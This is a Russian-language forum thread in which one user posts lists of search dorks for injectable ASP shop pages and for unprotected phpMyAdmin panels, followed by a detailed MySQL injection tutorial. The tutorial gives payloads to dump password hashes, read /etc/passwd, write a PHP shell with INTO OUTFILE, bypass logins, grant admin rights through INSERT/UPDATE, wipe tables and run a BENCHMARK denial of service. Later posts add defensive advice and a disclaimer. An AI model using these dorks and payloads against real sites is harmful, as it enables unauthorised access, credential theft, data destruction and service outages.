    ".asp?p="
    ".asp?pid="
    ".asp?ProdID="
    ".asp?product_id="
    ".asp?product="
    ".asp?productid="
    ".asp?showtopic="
    ".asp?Sku="
    ".asp?storeid="
    ".asp?style_id="
    ".asp?StyleID="
    ".asp?userID="
    "about.asp?cartID="
    "accinfo.asp?cartId="
    "acclogin.asp?cartID="
    "add.asp?bookid="
    "add_cart.asp?num="
    "addcart.asp?"
    "addItem.asp"
    "add-to-cart.asp?ID="
    "addToCart.asp?idProduct="
    "addtomylist.asp?ProdId="
    "adminEditProductFields.asp?intProdID="
    "advSearch_h.asp?idCategory="
    "affiliate.asp?ID="
    "affiliate-agreement.cfm?storeid="
    "affiliates.asp?id="
    "ancillary.asp?ID="
    "archive.asp?id="
    "article.asp?id="
    "aspx?PageID"
    "basket.asp?id="
    "Book.asp?bookID="
    "book_list.asp?bookid="
    "book_view.asp?bookid="
    "BookDetails.asp?ID="
    "browse.asp?catid="
    "browse_item_details.asp"
    "Browse_Item_Details.asp?Store_Id="
    "buy.asp?"
    "buy.asp?bookid="
    "bycategory.asp?id="
    "cardinfo.asp?card="
    "cart.asp?action="
    "cart.asp?cart_id="
    "cart.asp?id="
    "cart_additem.asp?id="
    "cart_validate.asp?id="
    "cartadd.asp?id="
    "cat.asp?iCat="
    "catalog.asp"
    "catalog.asp?CatalogID="
    "catalog_item.asp?ID="
    "catalog_main.asp?catid="
    "category.asp"
    "category.asp?catid="
    "category_list.asp?id="
    "categorydisplay.asp?catid="
    "checkout.asp?cartid="
    "checkout.asp?UserID="
    "checkout_confirmed.asp?order_id="
    "checkout1.asp?cartid="
    "comersus_listCategoriesAndProducts.asp?idCategory ="
    "comersus_optEmailToFriendForm.asp?idProduct="
    "comersus_optReviewReadExec.asp?idProduct="
    "comersus_viewItem.asp?idProduct="
    "comments_form.asp?ID="
    "contact.asp?cartId="
    "content.asp?id="
    "customerService.asp?TextID1="
    "default.asp?catID="
    "description.asp?bookid="
    "details.asp?BookID="
    "details.asp?Press_Release_ID="
    "details.asp?Product_ID="
    "details.asp?Service_ID="
    "display_item.asp?id="
    "displayproducts.asp"
    "downloadTrial.asp?intProdID="
    "emailproduct.asp?itemid="
    "emailToFriend.asp?idProduct="
    "events.asp?ID="
    "faq.asp?cartID="
    "faq_list.asp?id="
    "faqs.asp?id="
    "feedback.asp?title="
    "freedownload.asp?bookid="
    "fullDisplay.asp?item="
    "getbook.asp?bookid="
    "GetItems.asp?itemid="
    "giftDetail.asp?id="
    "help.asp?CartId="
    "home.asp?id="
    "index.asp?cart="
    "index.asp?cartID="
    "index.asp?ID="
    "info.asp?ID="
    "item.asp?eid="
    "item.asp?item_id="
    "item.asp?itemid="
    "item.asp?model="
    "item.asp?prodtype="
    "item.asp?shopcd="
    "item_details.asp?catid="
    "item_list.asp?maingroup"
    "item_show.asp?code_no="
    "itemDesc.asp?CartId="
    "itemdetail.asp?item="
    "itemdetails.asp?catalogid="
    "learnmore.asp?cartID="
    "links.asp?catid="
    "list.asp?bookid="
    "List.asp?CatID="
    "listcategoriesandproducts.asp?idCategory="
    "modline.asp?id="
    "myaccount.asp?catid="
    "news.asp?id="
    "order.asp?BookID="
    "order.asp?id="
    "order.asp?item_ID="
    "OrderForm.asp?Cart="
    "page.asp?PartID="
    "payment.asp?CartID="
    "pdetail.asp?item_id="
    "powersearch.asp?CartId="
    "price.asp"
    "privacy.asp?cartID="
    "prodbycat.asp?intCatalogID="
    "prodetails.asp?prodid="
    "prodlist.asp?catid="
    "product.asp?bookID="
    "product.asp?intProdID="
    "product_info.asp?item_id="
    "productDetails.asp?idProduct="
    "productDisplay.asp"
    "productinfo.asp?item="
    "productlist.asp?ViewType=Category&CategoryID= "
    "productpage.asp"
    "products.asp?ID="
    "products.asp?keyword="
    "products_category.asp?CategoryID="
    "products_detail.asp?CategoryID="
    "productsByCategory.asp?intCatalogID="
    "prodView.asp?idProduct="
    "promo.asp?id="
    "promotion.asp?catid="
    "pview.asp?Item="
    "resellers.asp?idCategory="
    "results.asp?cat="
    "savecart.asp?CartId="
    "search.asp?CartID="
    "searchcat.asp?search_id="
    "Select_Item.asp?id="
    "Services.asp?ID="
    "shippinginfo.asp?CartId="
    "shop.asp?a="
    "shop.asp?action="
    "shop.asp?bookid="
    "shop.asp?cartID="
    "shop_details.asp?prodid="
    "shopaddtocart.asp"
    "shopaddtocart.asp?catalogid="
    "shopbasket.asp?bookid="
    "shopbycategory.asp?catid="
    "shopcart.asp?title="
    "shopcreatorder.asp"
    "shopcurrency.asp?cid="
    "shopdc.asp?bookid="
    "shopdisplaycategories.asp"
    "shopdisplayproduct.asp?catalogid="
    "shopdisplayproducts.asp"
    "shopexd.asp"
    "shopexd.asp?catalogid="
    "shopping_basket.asp?cartID="
    "shopprojectlogin.asp"
    "shopquery.asp?catalogid="
    "shopremoveitem.asp?cartid="
    "shopreviewadd.asp?id="
    "shopreviewlist.asp?id="
    "ShopSearch.asp?CategoryID="
    "shoptellafriend.asp?id="
    "shopthanks.asp"
    "shopwelcome.asp?title="
    "show_item.asp?id="
    "show_item_details.asp?item_id="
    "showbook.asp?bookid="
    "showStore.asp?catID="
    "shprodde.asp?SKU="
    "specials.asp?id="
    "store.asp?id="
    "store_bycat.asp?id="
    "store_listing.asp?id="
    "Store_ViewProducts.asp?Cat="
    "store-details.asp?id="
    "storefront.asp?id="
    "storefronts.asp?title="
    "storeitem.asp?item="
    "StoreRedirect.asp?ID="
    "subcategories.asp?id="
    "tek9.asp?"
    "template.asp?Action=Item&pid="
    "topic.asp?ID="
    "tuangou.asp?bookid="
    "type.asp?iType="
    "updatebasket.asp?bookid="
    "updates.asp?ID="
    "view.asp?cid="
    "view_cart.asp?title="
    "view_detail.asp?ID="
    "viewcart.asp?CartId="
    "viewCart.asp?userID="
    "viewCat_h.asp?idCategory="
    "viewevent.asp?EventID="
    "viewitem.asp?recor="
    "viewPrd.asp?idcategory="
    "ViewProduct.asp?misc="
    "voteList.asp?item_ID="
    "whatsnew.asp?idCategory="
    "WsAncillary.asp?ID="
    "WsPages.asp?ID="
     
  8. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    Докрки для поиска PHPmyadmin без паролей:
    intitle:phpmyadmin inurl:server_processlist.php
    intitle:phpmyadmin inurl:tbl_operations.php
    intitle:phpmyadmin inurl:server_collations.php
    intitle:phpmyadmin inurl:server_databases.php
    intitle:phpmyadmin inurl:server_export.php
    intitle:phpmyadmin inurl:server_engines

     
    #8 Kluch, 28 мар 2016
    Последнее редактирование: 28 мар 2016
  9. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    [paste:font size="5"][Ссылки могут видеть только зарегистрированные пользователи.], это в большинстве случаев может однозначно свидетельствовать о наличии SQLинъекции в нефильтруемом целом параметре.

    Что ещё может говорить о потенциальной возможности SQL инъекции:

    • запрос вернул пустой результат;
    • возвращается код ответа 500;
    • происходит переход на главную страницу сайта, в то время как при пустом результате запроса будет возвращена пустая страница.
    [paste:font size="5"][Ссылки могут видеть только зарегистрированные пользователи.] , вероятно, будет возвращен пустой sql запрос, в то время, как Код: [Ссылки могут видеть только зарегистрированные пользователи.]' должен породить ошибку.

    Теперь, зная как отличить ошибочный запрос от пустого, начинаем последовательно извлекать информация о запросе и базе данных.

    Рассмотрим случай, когда иньекция происходит после where. Если мы рассматриваем MySQL базу данных, то получение информации из базы данных может быть возможным только, если сервер имеет версию 4.*, те имеется возможность вставить в запрос union

    1 количество полей между select и where

    Пробуем последовательно, пока не получим верный запрос: Код:[Ссылки могут видеть только зарегистрированные пользователи.]*

    [Ссылки могут видеть только зарегистрированные пользователи.]* более, того, если не имеется возможность отделить неверный запрос от возвратившего пустой результат, можно сделать так: Код: [Ссылки могут видеть только зарегистрированные пользователи.]*

    [Ссылки могут видеть только зарегистрированные пользователи.]* Для этого, нам достаточно уметь отделять правильный запрос от неправильного, а это возможно всегда, если имеется факт наличия SQL инъекции.

    После того, как мы получим правильный запрос, количество null, будет равно количеству полей между select и where

    2 номер столбца с выводом. Нам понадобится знать, в каком по счету столбце происходит вывод на страницу.

    При этом, если выводиться на страницу несколько параметров, то лучше найти тот, который, как кажется, имеет наибольший размер типа данных (text лучше всего), как например, описание товара, текст статьи и тд. Ищем его: Код:[Ссылки могут видеть только зарегистрированные пользователи.]'test',null,null/*

    [Ссылки могут видеть только зарегистрированные пользователи.],'test',null/* И до тех пор, пока не увидим слово test в нужном нам месте.

    Следует обратить внимание, что в этом случае один из подобных запросов обязательно вернет непустое значение.

    Тут можно наткнутся на подводный камень: в скрипте, возможно имеется проверка на не пустоту одного из параметров (например, id) тут придется воспользоваться свойством MySQL, числовой тип может быть приведен к любому типу данных, без возникновения ошибки, причем так, что сохранит свое значение. Код: [Ссылки могут видеть только зарегистрированные пользователи.]* Этот же фокус пройдет и там, где кавычки экранируются.

    Открытие комментария добавлена для того, чтобы отбросить, остальную часть запроса, если она имеется. MySQL нормально реагирует на незакрытый комментарий.
     
  10. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    3 имена таблиц

    Теперь можно перебирать имена таблиц. Код: [Ссылки могут видеть только зарегистрированные пользователи.]* Правильные запросы будут соответствовать существующим именам таблиц. Наверно, интересно будет проверить на существование таблиц users, passwords, regusers и тд и тп.

    4системная информация

    у нас уже достаточно информации чтобы составить такой запрос. Код:[Ссылки могут видеть только зарегистрированные пользователи.]? id=9999+union+select+null,mysql.user.password,null+from+mysql.user/* В случае, если имеются права на select из базы данных mysql, то этот запрос вернет нам хеш пароля, который в большинстве случаев легко расшифруется. Если выводиться только одна строка из запроса (например, вместо тела статьи), то можно передвигаться по строкам Код: [Ссылки могут видеть только зарегистрированные пользователи.]? id=9999+union+select+null,mysql.user.password,null+from+mysql.user+limit+0,1/*

    [Ссылки могут видеть только зарегистрированные пользователи.]? id=9999+union+select+null,mysql.user.password,null+from+mysql.user+limit+1,1/* Кроме того можно узнать много интересного: Код: [Ссылки могут видеть только зарегистрированные пользователи.](),null/*

    [Ссылки могут видеть только зарегистрированные пользователи.](),null/*

    [Ссылки могут видеть только зарегистрированные пользователи.](),null/* 5 названия столбцов в таблице

    Их аналогично, можно перебрать: Код: [Ссылки могут видеть только зарегистрированные пользователи.]* и тд.

    текст файлов через MySQL инъекцию.

    Если пользователь, под которым осуществляется доступ к бд, имеет права file_priv, то можно получить текст произвольного файла Код:[Ссылки могут видеть только зарегистрированные пользователи.]('/etc/passwd'),null/* запись файлов в веб директорию (php shell).

    Как показала практика, если мы имеем права file_priv, директорию, доступную на запись всем пользователям, доступную кроме того из web, (иногда, директории upload, banners и тд.), а так же знаем имя хотя бы одной таблицы (mysql.user, например сойдет, если имеется доступ к mysql базе данных), то можно выгрузить произвольный файл на сервер используя инъекцию подобного типа. Код: [Ссылки могут видеть только зарегистрированные пользователи.],'',null+from+table1+into+outfile+'/usr/local/site/www/banners/cmd.php'/* При этом конструкция from table1 обязательна.

    Если кроме того, на сайте имеется уязвимость, позволяющая выполнять произвольные файлы на сервере, (include(»/path/$file.php»)), то, в любом случае можно закачать php shell, например в директорию /tmp/, и затем подцепить этот файл оттуда при помощи уязвимости в include.

    инъекция после limit.

    Довольно части возможность SQL инъекции возникает внутри параметра, передающегося к limit. Это может быть номер страницы и тд и тп.

    Практика показывает, что все вышесказанное может быть применено и в этом случае.

    MySQL корректно реагирует на запросы типа:

    Select … limit 1,2 union select….

    Select … limit 1 union select….

    Если необходимо чтобы первый подзапрос вернул пустой результат, необходимо искусственно задать большие смещения для первого запросы:

    Select … limit 99999,1 union select…. Либо, Select … limit 1,0 union select….

    некоторые «подводные камни».
     
  11. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    1 Magic quotes

    Наиболее частым подводным камнем может оказаться включение магических кавычек в конфигурации php. В случае строковых параметров это вообще позволит избежать возможности SQL инъекции, а в случае целый (дробных) параметров, в подобных запросах невозможно будет использовать кавычки, а следовательно и строки.

    Частично, решить эту проблему поможет нам функция char, которая возвращает строке по кодам символов. Например Код: [Ссылки могут видеть только зарегистрированные пользователи.](116,101,115,116),null,null/* Код:[Ссылки могут видеть только зарегистрированные пользователи.](116,101,115,116),null,null+from_table1/* Код:[Ссылки могут видеть только зарегистрированные пользователи.](char(47,101,116,99,47,112,97,115,115,119,100)),null/* Единственное ограничение. В случае, если хочется сделать into outfile, то а качестве имени файла, необходимо передать имя файла в кавычках. into outfile char(…) выдает ошибку.

    2 Mod_security.

    Казалось бы, этот модуль веб сервера apache, делает невозможным эксплуатацию уязвимости SQL инъекции. Однако, при некоторых конфигурациях PHP и этого модуля, атаку можно провести прозрачно для этого модуля.

    Конфигурация по умолчанию модуля mod_security не фильтрует значение, переданные как cookie. Одновременно, в некоторых случаях, а также в некоторых конфигурациях по умолчанию php, переменные cookie регистрируются автоматически.

    Таким образом, злонамеренные значения переменных, абсолютно прозрачно для mod_security можно передать как cookie значения.

    DOS в MySQL инъекции.

    Если не имеется возможности применения union в запросе, например, MySQL имеет версию 3.*, то, тем не менее, инъекцию можно эксплуатировать, например, для того, чтобы заставить сервер базы данных исчерпать все свои ресурсы.

    Для этого, будем использовать функцию BENCHMARK, которая повторяет выполнение выражения expr заданное количество раз, указанное в аргументе count. В качестве основного выражения возьмем функцию, которая сама по себе требует некоторого времени. Например, md5(). В качестве строки возьмем current_date, чтобы строка не содержала кавычек. Функции BENCHMARK можно вкладывать друг в друга. И так, составляем запрос: Код:[Ссылки могут видеть только зарегистрированные пользователи.](10000000,BENCHMARK(10000000,md5(current_date))) 1000000 запросов md5 выполняются (в зависимости от мощности сервера), примерно 5 секунд, 10000000 будут выполнятся около 50 секунд. Вложенный benchmark будет выполняться очень долго, на любом сервере. Теперь останется отправлять до нескольких десятков подобных http запросов в секунду, чтобы ввести сервер в беспробудный даун.

    другие типа MySQL инъекции.

    Фильтровать целые значения для целых параметров и кавычки для строковых параметров порой недостаточно. Иногда к незапланируемой функциональности может привести применение % и _ специальных символов внутри like запроса. Например: Код: mysql_query(«select id from users where password like '».addslashes($password).»' and user like '».addslashes($user).»'»); в этом случае к любому пользователю подойдет пароль %

    apache mod_rewrite

    В некоторых случаях, СКЛ инъекция возможна даже в параметре, который преобразуется методами mod_rewrite модуля apache, к GET параметру скрипта.

    Например, скрипты типа /news/127.html преобразуются к Код: /news/news.php?id=127 следующим правилом: Код: RewriteRule ^/news/(.*)\.html$ »/news/news.php?id=$1» Это позволит передать злонамеренные значения параметра скрипту. Так, например /news/128-1.html

    Если выводятся подробные сообщения об ошибках, то можно сразу узнать адрес скрипа, и далее, подобрав параметр работать уже с ним. Если же нет, то можно исследовать уязвимость, прямо редактируя имя файла.

    коротко о защите.
     
  12. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    Для защиты от всего вышесказанного достаточно придерживаться нескольких простых правил.

    1 для целых и дробных величин, перед их использованием в запросе достаточно привести величину к нужному типу. Код: $id=(int)$id; $total=(float)$total; Вместо этого можно вставить систему слежения за тестированием на SQL инъекцию. Код: if((string)$id<>(string)(int)$id) { пишем в лог о попытке Код: die('ops'); } 2 для строковых параметров, которые не используются в like, regexp и тд, экранируем кавычки. Код: $str=addslashes($str); или, лучше, Код: mysql_escape_string($str) 3 в строках, которые предполагается использовать внутри like, regexp и тд, необходимо так же заэкранировать специальные символы, применяющиеся в этих операторах, если это необходимо. В противном случае, можно задокументировать использование этих символов.
     
  13. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    --------------------------------------------------------------------------------------------------------------------
    Конечно, вывода ошибок может и не быть, но это не означает, что ошибки нет.

    [Ссылки могут видеть только зарегистрированные пользователи.]

    как результат "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1"

    или

    [Ссылки могут видеть только зарегистрированные пользователи.]

    результат "Unknown column '1qwerty' in 'where clause'"

    запрос

    [Ссылки могут видеть только зарегистрированные пользователи.]

    при наличии уязвимости должен выдать результат, аналогичный

    [Ссылки могут видеть только зарегистрированные пользователи.]

    Подобные уязвимости позволяют модифицировать запрос в части параметра WHERE.

    Первое, что сделает злоумышленник при обнаружении такой уязвимости - исследует, какое количество полей используется в запросе. Для этого задается заведомо неверный id, чтобы исключить вывод реальной информации и объединяется с запросом с одинаковым количеством пустых полей.

    [Ссылки могут видеть только зарегистрированные пользователи.]

    количество "null" должно соответствовать количеству полей, которые используются в запросе.

    Если запрос выдает ошибку, добавляется еще одно пустое значение, до тех пор пока не исчезнет ошибка и не будет получен результат с пустыми данными. Далее объединенные поля заменяются на значения, которые можно визуально наблюдать на странице.

    Например,

    [Ссылки могут видеть только зарегистрированные пользователи.],

    теперь на странице, где должен был быть показан заголовок новости, будет красоваться qwerty.

    версия MySql
    [Ссылки могут видеть только зарегистрированные пользователи.](),null,null

    [Ссылки могут видеть только зарегистрированные пользователи.](),null,null

    [Ссылки могут видеть только зарегистрированные пользователи.](),null,null

    логин текущего пользователя базы данных
    [Ссылки могут видеть только зарегистрированные пользователи.](),null,null

    имя используемой базы данных
    [Ссылки могут видеть только зарегистрированные пользователи.](),null,null

    Получение данных из других таблиц:
    SELECT * FROM `news` WHERE `id`=-1 UNION SELECT null,`password`,null,null from `users`where `id`=1
    Вот таким нехитрым способом узнают пароль или хэш пароля админа.

    Если же текущий пользователь имеет права доступа к базе "mysql", без малейших проблем злоумышленник получит хэш пароля админа.

    [Ссылки могут видеть только зарегистрированные пользователи.]

    Теперь его подбор это просто вопрос времени.

    Поиск
    Поиск - одно из наиболее уязвимых мест, поскольку одновременно передается большое количество параметров запроса. Пример простого запроса, который выполняет поиск по ключевому слову:
    SELECT * FROM `news` WHERE `title` LIKE '%$search%' OR `text` LIKE '%$search%'
    $search - слово, которое передается с формы.

    Злоумышленник может передать в переменной $search = '# теперь запрос будет выглядеть следующим образом:
    SELECT * FROM `news` WHERE `title` LIKE '%'#%' OR `text` LIKE '%'#%'
    Соответственно вместо результатов поиска по ключевому слову будут выданы все данные. Это также позволяет использовать возможность объединения запросов, описанную выше.
     
  14. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    Использование параметра ORDER
    Часто можно увидеть, что при введении параметров поиска, или выводе информации дают возможность пользователю сортировать данные по определенным полям. Скажу сразу, что использование данной уязвимости не является слишком опасным, поскольку при попытке объединения запросов вызовет ошибку, однако в паре с уязвимостями в других полях есть опасность закомментирования этого параметра.

    [Ссылки могут видеть только зарегистрированные пользователи.]

    параметр ORDER формируется в зависимости от переменной $sort

    $search =' /*
    $sort = */

    Будет сформирован следующий запрос:
    SELECT * FROM `news` WHERE `title` LIKE '%'/*%' OR `text` LIKE '%'/*%' ORDER BY */тем самым закомментируется одно из условий и параметр ORDER
    Теперь можно снова объединить запрос, присвоив $sort=*/ UNION SELECT....

    Как вариант использования уязвимости этого параметра:
    SELECT * FROM `users` ORDER BY LENGTH(password);Позволит отсортировать пользователей в зависимости от длины пароля, при условии, что он сохраняется в "чистом" виде.

    Авторизация
    Попробуем теперь рассмотреть варианты SQL инъекций, которые возникают при авторизации пользователей. Как правило запрос, который проверяет правильность данных авторизации выглядит следующим образом:
    SELECT * FROM `users` WHERE `login`='$login' AND `password`='$password';
    где $login и $password это переменные, которые передаются с формы.

    Подобный запрос возвращает данные по пользователю в случае успеха, а в случае неудачи пустой результат.

    Соответственно для того, чтобы пройти авторизацию злоумышленнику достаточно модифицировать запрос таким образом, чтобы он вернул ненулевой результат. Задается логин, который соответствует реальному пользователю, а вместо пароля указывается ' OR '1'='1
    Или какое-нибудь истинное условие
    (1, 'a'='a', 1<>2, 3>2, 1+1, ISNULL(NULL), 2 IN (0,1,2), 2 BETWEEN 1 AND 3)

    Соответственно запрос будет сформирован следующим образом:
    SELECT * FROM `users` WHERE `login`='admin' AND `password`='' OR '1'='1';что вернет результат, а как следствие, приведет к несанкционированной авторизации. А если пароли в базе данных хэшированные? Тогда проверку пароля просто "отключают", закомментировав все, что идет после `login`. В форме вместо логина назначается логин реального пользователя и '# тем самым закомментируется проверка пароля.

    SELECT * FROM `users` WHERE `login`='admin'#' AND `password`='12345'

    как вариант 'OR `id`=2#

    SELECT * FROM `users` WHERE `login`='' OR `id`=2#' AND `password`='12345'
    Таким образом можно пройти авторизацию без знания реального логина. Случай с
    SELECT * FROM `users` WHERE `login`='' OR `admin`=1#' AND `password`='12345'позволяет пройти авторизацию с правами админа.

    Большой ошибкой является проверка пароля следующим образом:
    SELECT * FROM `users` WHERE `login`='$login' AND `password` LIKE
    '$password'поскольку в этом случае для любого логина подойдет пароль %

    INSERT & UPDATE
    Однако не только SELECT-ы являются уязвимым местом SQL. Не менее уязвимыми могут оказаться INSERT и UPDATE.

    Допустим, на сайте есть возможность регистрации пользователей. Запрос, который добавляет нового пользователя:
    INSERT INTO `users` (`login`, `password`,`admin`) VALUES ('юзер',
    'пароль',0);Уязвимость одного из полей позволяет модифицировать запрос с необходимыми данными.

    В поле login добавляем юзер', 'пароль', 1)#тем самым добавив пользователя с правами админа.
    INSERT INTO `users` (`login`, `password`,`admin`) VALUES ('юзер', 'пароль', 1)# ,'пароль',0);Допустим, что поле `admin` находится перед полем `login`, соответственно трюк с заменой данных, которые идут после поля `login` не проходит. Вспоминаем, что синтаксис команды INSERT позволяет добавлять не только одну строчку, а несколько.

    Пример уязвимости в поле login:
    $login= юзер', 'пароль'),(1,'хакер', 'пароль')#
    INSERT INTO `users` (`admin`,`login`, `password`) VALUES (0,'юзер',
    'пароль'),(1,'хакер', 'пароль')#','пароль');

    Таким образом создается 2 записи, одна с правами простого пользователя, другая с желаемыми правами админа.

    Подобная ситуация и с UPDATE

    Добавление дополнительных полей для изменения:
    $login=', `password`='', `admin`='1
    Тогда подобный запрос
    UPDATE `users` SET `login`='чайник' WHERE `id`=2;
    Модифицируется следующим образом:
    UPDATE `users` SET `login`='', `password`='', `admin`='1' WHERE `id`=2;
    Что произойдет? Пользователь с ID 2 изменит логин и пароль на пустые значения и получит права админа.

    Или в случае

    $login = ', `password`='' WHERE `id` =1#

    Логин и пароль админа станут пустыми.

    DELETE
    тут все просто, никаких данных получить или изменить не удастся, но удалить лишнее - всегда пожалуйста.
    $id=1 OR 1=1
    И запрос
    DELETE FROM `news` WHERE `id`=1 OR 1=1;почистит все записи в таблице.

    Вместо 1=1 может быть любое истинное условие, про которое говорилось выше. Может спасти параметр LIMIT, который ограничит количество удаленных строк, но не всегда, его могут просто закомментировать.

    DELETE FROM `news` WHERE `id`=1 OR 1=1# LIMIT 1;
     
  15. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    Работа с файлами через SQL-инъекции.
    Сильно сомневаюсь, что это где-то может пройти, но справедливости ради нужно описать и такие способы. При включенных привилегиях file можно использовать команды LOAD_FILE и OUTFILE.

    Про их опасность можно судить из нижеприведенных запросов:
    SELECT * FROM `news` WHERE `id`=-1 union select null,LOAD_FILE('/etc/passwd'),null,null;
    SELECT * FROM `news` WHERE `id`=-1 union select
    null,LOAD_FILE('/home/test/www/dbconf.php'),null,null;

    Но на этом все беды еще не заканчиваются.
    SELECT * FROM `news` WHERE `id`=-1 union select null,'',null,null FROM `news` into outfile
    '/home/test/www/test.php';
    Вот так записываем файл, который содержит php код. Правда кроме кода, в нем будет еще несколько записей null но это никаким образом не повлияет на работоспособность php кода.

    Однако есть несколько условий, благодаря которым эти способы сработают:

    • Включена привилегия FILE для текущего пользователя базы данных;
    • Права на чтение или запись этих файлов для пользователя, под которым запускается MySQL сервер
    • абсолютный путь к файлу;
      менее важное условие - размер файла должен быть меньше чем max_allowed_packet, но поскольку в MySQL 3.23 размер наибольшего пакета
      может быть 16 мБ, а в 4.0.1 и более, размер пакета ограничивается только количеством доступной памяти, вплоть до теоретического максимума в 2 Гб это условие как правило всегда доступно.

      Magic quotes
      Магические кавычки делают невозможным использование SQL инъекций в строковых переменных, поскольку автоматически экранирует все ' та " Которые приходят с $_GET та $_POST.

      Но это не касается использования уязвимостей в целых или дробных параметрах, правда с поправкой, что нельзя будет использовать '. В этом случае помогает функция сhar.
      SELECT * FROM `news` WHERE `id`=-1 UNION SELECT
      null,char(116,101,115,116),null,null;

      DOS через SQL-инъекцию.
      Чуть не забыл сказать, а знатоки SQL подтвердят, что операция UNION возможна только в MySQL >=4.0.0. С облегчением вздохнули люди, у которых проекты на предыдущих версиях :) Но не все так безопасно, как выглядит на первый взгляд. Логику злоумышленника иногда сложно проследить. "Не получится взломать, так хоть
      завалю" подумает хацкер, набирая функцию BENCHMARK для примера запрос
      SELECT * FROM `news` WHERE `id`=BENCHMARK(1000000,MD5(NOW()));
      выполнялся у меня от 12 до 15 секунд. Добавив нолик - 174 секунды. На большее у меня просто не поднялась рука.

      Конечно, на мощных серверах такие вещи будут выполняться намного быстрее, но...BENCHMARK позволяет вкладывать себя один в один.

      Вот так:
      SELECT * FROM `news` WHERE `id`=BENCHMARK(1000000,BENCHMARK(1000000,MD5(NOW())));
      Или даже вот так
      SELECT * FROM `news` WHERE
      `id`=BENCHMARK(1000000,BENCHMARK(1000000,BENCHMARK(1000000,MD5(NOW()))));
      Да и количество нулей ограничено разве что "добротой" того, кто их набирает.

      Я думаюч то даже ОЧЕНЬ мощная машина, не сможет с легкостью проглотить такие запросы.

      Итог
      На этом все. В этой стстье я старался максимально охватить варианты уязвимостей, которые допускают программисты при создании программ с использованием баз данных MySQL. Однако я более чем уверен, что это далеко
      не полный перечень.
      Поэтому важно запомнить несколько правил:



      Не доверяйте НИКАКИМ данным, которые приходят от пользователя.
      Речь идет не только о данных, которые передаются массивами $_GET и $_POST. Не следует забывать про $_COOKIE и другие части HTTP-заголовков. Следует помнить про те, что их легко подменить.

      Не стоит надеяться на опцию PHP "magic quotes"
      Которые наверно больше мешают чем помогают. Все данные, которые передаются в базу данных должны быть сведены по типам с полями
      базы данных. ( $id=(int)$_GET['id'] ) или защищены функциями mysql_escape_string или mysql_real_escape_string.

      mysql_real_escape_string не экранирует % и _, поэтому не стоит ее использовать в паре с LIKE.
      Не стоит также сильно надеяться на правильно написанный mod_rewrite. Это только способы для создания "удобных" УРЛ-ов, но уж никак не способ защиты от SQL-инъекций.

      Отключите вывод информации об ошибках.
      Не помагайте нехорошим посетителям. Даже если ошибка будет выявлена, отсутствие информации о ней серьезно затруднит ее применение. Помните про разницу между стадией разработки и рабочим проектом. Вывод ошибок и другой детальной информации - ваш союзник на стадии разработки, и союзник злоумышленника в рабочем варианте. Не стоит также прятать их, комментируя в HTML коде, на 1000-чу посетителей найдется 1, который таки найдет подобные вещи.
     
  16. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    Обрабатывайте ошибки.

    Напишите обработку SQL запросов таким образом, чтобы информация о них сохранялась в каких-нибудь логах или отсылалась по почте.

    Не сохраняйте данные доступа к базе данных в файлах, которые не обрабатываются PHP как код.
    Думаю никому не открыл Америки, но по собственному опыту могу сказать, что подобная практика достаточно распространена. Как правило это файл с расширением *.inc

    Не создавайте "супер-пользователя" базы данных.
    Предоставляйте только права, необходимые для выполнения конкретных задач.

    В поиске стоит ограничить минимальное и максимальное количество символов, являющееся параметрами запроса.
    Для честного пользователя вполне достаточно от 3-х до 60-70 символов, чтобы удовлетворить свои поисковые интересы, и одновременно вы предупреждаете ситуации, когда поисковым запросом станет том "Войны и мира".

    Всегда проверяйте количество возвращенных записей после запроса
    Почти на 90% сайтов, написанных на php встречается такая логическая ошибка, особенно это можно наблюдать, когдаделается запрос на основе полученного ID от пользователя, если руками дать скрипту несуществующий ID - мы увидим достаточно интересные результаты работы некоторых скриптов, вместо того чтобы вернуть 404 программа в лучшем случае ничего не сделает и выведет в браузер чистую страницу.

    Безопасного вам SQL-я ;)
    Все описанное в статье было выполнено в качестве эксперимента на тестовой базе, владельцем которой является автор статьи. Никакие данные других людей не были уничтожены или изменены.

    Автор статьи не несет никакой ответственности за использование способов, описанных в данной статье, поскольку предполагалось, что она была написана с целью информирования о уязвимостях программ
     
  17. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    ап
     
    #17 Kluch, 9 июн 2016
    Последнее редактирование: 9 июн 2016

Поделиться этой страницей

Яндекс.Метрика